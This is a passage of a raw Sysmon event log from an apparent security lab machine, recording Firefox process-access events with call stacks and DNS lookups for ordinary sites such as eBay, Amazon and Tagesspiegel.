Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.542{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.489{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.489{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.905{59A5CD1D-945A-6005-3305-00000000A301}7052cs950197015.wpc.systemcdn.net0152.199.23.155;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.904{59A5CD1D-945A-6005-3305-00000000A301}7052ir.ebaystatic.com0type: 5 ir.ebaycdn.net;type: 5 cs950.wpc.a45dd.systemcdn.net;type: 5 cs950197015.wpc.systemcdn.net;::ffff:152.199.23.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.902{59A5CD1D-945A-6005-3305-00000000A301}7052e9428.a.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.900{59A5CD1D-945A-6005-3305-00000000A301}7052e9428.a.akamaiedge.net0104.75.89.51;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.899{59A5CD1D-945A-6005-3305-00000000A301}7052www.ebay.com0type: 5 slot9428.ebay.com.edgekey.net;type: 5 e9428.a.akamaiedge.net;::ffff:104.75.89.51;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.807{59A5CD1D-8E56-6005-2E00-00000000A301}2464228.32.239.54.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.807{59A5CD1D-8E56-6005-2E00-00000000A301}246460.118.95.52.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.572{59A5CD1D-945A-6005-3305-00000000A301}7052unagi.amazon.de0type: 5 unagi-eu.amazon.com;::ffff:54.239.32.228;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:15.401{59A5CD1D-945A-6005-3305-00000000A301}7052www.tagesspiegel.de02606:4700::6813:9004;2606:4700::6813:ff03;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.400{59A5CD1D-945A-6005-3305-00000000A301}7052www.tagesspiegel.de0104.19.144.4;104.19.255.3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.399{59A5CD1D-945A-6005-3305-00000000A301}7052www.tagesspiegel.de0::ffff:104.19.255.3;::ffff:104.19.144.4;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.779{59A5CD1D-8E56-6005-2E00-00000000A301}2464235.118.95.52.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.778{59A5CD1D-8E56-6005-2E00-00000000A301}24648.122.95.52.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.479{59A5CD1D-945A-6005-3305-00000000A301}7052unagi-eu.amazon.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.388{59A5CD1D-945A-6005-3305-00000000A301}7052unagi-eu.amazon.com054.239.32.228;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.387{59A5CD1D-945A-6005-3305-00000000A301}7052unagi-eu.amazon.com0::ffff:54.239.32.228;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:14.150{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu.amazon-adsystem.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.149{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu.amazon-adsystem.com052.95.118.60;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.148{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu.amazon-adsystem.com0::ffff:52.95.118.60;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.115{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu-retail-direct.amazon-adsystem.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.379{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.379{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.364{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.160{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.160{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.160{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.148{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.148{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.148{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.148{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.147{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.129{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.129{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla 